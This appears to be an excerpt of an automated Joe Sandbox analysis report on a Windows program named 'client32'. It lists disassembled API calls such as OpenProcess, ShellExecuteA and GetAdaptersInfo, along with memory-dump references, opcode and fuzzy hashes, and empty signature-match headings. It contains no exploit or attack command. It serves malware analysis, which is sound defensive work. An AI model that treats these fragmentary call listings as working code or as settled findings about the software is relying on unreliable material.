                                                                                                                        • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                        • API String ID: 1613046405-2825297712
                                                                                                                        • Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                        • Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
                                                                                                                        • Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                        • Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                        • wsprintfA.USER32 ref: 1102741E
                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                          • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                        • wsprintfA.USER32 ref: 11027448
                                                                                                                        • ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
                                                                                                                        • String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
                                                                                                                        • API String ID: 816263943-3387570681
                                                                                                                        • Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                        • Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
                                                                                                                        • Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                        • Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91
                                                                                                                        APIs
                                                                                                                        • FindWindowA.USER32(?,00000000), ref: 1108B274
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
                                                                                                                        • OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessWindow$FindOpenThread
                                                                                                                        • String ID: Error. NULL hToken$Progman
                                                                                                                        • API String ID: 3432422346-976623215
                                                                                                                        • Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                        • Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
                                                                                                                        • Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                        • Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 685B0BB8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685B0BCB
                                                                                                                        • _malloc.LIBCMT ref: 685B0BF3
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        • _free.LIBCMT ref: 685B0BEB
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 685B0C10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                        • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                                        • API String ID: 1157017740-2359281783
                                                                                                                        • Opcode ID: 48d76f62855ec62bb0d9381c7b5b35f1ce5325d13110ff4c0c651642cc7edece
                                                                                                                        • Instruction ID: 25c412f5d11d50333bc8d02ec31f9a5d9c67d0bd2d4d25448c060648db914400
                                                                                                                        • Opcode Fuzzy Hash: 48d76f62855ec62bb0d9381c7b5b35f1ce5325d13110ff4c0c651642cc7edece
                                                                                                                        • Instruction Fuzzy Hash: 76F0C8B6500741ABD6609B74DDA4D5BB7ECAFA56047508C2EE96AC7500EB35FC40C724
                                                                                                                        APIs
                                                                                                                        • LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
                                                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110033EA
                                                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 1100340C
                                                                                                                        • DestroyMenu.USER32(00000000), ref: 1100341A
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                        • API String ID: 468487828-934300333
                                                                                                                        • Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                        • Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
                                                                                                                        • Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                        • Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,685D72D8,00000008,685B6F3F,00000000,00000000), ref: 685B6E48
                                                                                                                        • __lock.LIBCMT ref: 685B6E7C
                                                                                                                          • Part of subcall function 685BF4BC: __mtinitlocknum.LIBCMT ref: 685BF4D2
                                                                                                                          • Part of subcall function 685BF4BC: __amsg_exit.LIBCMT ref: 685BF4DE
                                                                                                                          • Part of subcall function 685BF4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,685B6E81,0000000D), ref: 685BF4E6
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 685B6E89
                                                                                                                        • __lock.LIBCMT ref: 685B6E9D
                                                                                                                        • ___addlocaleref.LIBCMT ref: 685B6EBB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                        • String ID: @C]h$KERNEL32.DLL
                                                                                                                        • API String ID: 637971194-3482674546
                                                                                                                        • Opcode ID: 7fc64abea5d065c58e64946b5d256ec5bf0912e5ab4918f8221096cc1eae2d08
                                                                                                                        • Instruction ID: 94732c05d8383e3519f0fe6e567bf10f0ad84ecaf2e01f0155b324d556af2794
                                                                                                                        • Opcode Fuzzy Hash: 7fc64abea5d065c58e64946b5d256ec5bf0912e5ab4918f8221096cc1eae2d08
                                                                                                                        • Instruction Fuzzy Hash: 6D016179400B00DEDB209F69C85575FFBF0BFA1324F50890ED996977A0CB74A940CB59
                                                                                                                        APIs
                                                                                                                        • LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
                                                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110032F3
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 11003317
                                                                                                                        • DestroyMenu.USER32(00000000), ref: 11003329
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                        • API String ID: 4241058051-934300333
                                                                                                                        • Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                        • Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
                                                                                                                        • Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                        • Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6
                                                                                                                        APIs
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3489003387-0
                                                                                                                        • Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                        • Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
                                                                                                                        • Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                        • Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 1113F2CB
                                                                                                                        • GetSubMenu.USER32(?,00000000), ref: 1113F2E8
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 1113F309
                                                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 1113F312
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
                                                                                                                        • DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
                                                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 1113F33A
                                                                                                                        • DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$Delete$Count
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1985338998-0
                                                                                                                        • Opcode ID: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                        • Instruction ID: 90b1ebb2a37eac89ef99d909188e48f60dab5b42f4deb930a222ec681177ebb5
                                                                                                                        • Opcode Fuzzy Hash: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                        • Instruction Fuzzy Hash: 3F117C7680421ABBE702DB618CC8AAEFB7CEFC566AF108029F695D2144E7749541CB63
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 1103D3D1
                                                                                                                        • _memmove.LIBCMT ref: 1103D3DE
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                          • Part of subcall function 1103D0B0: Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
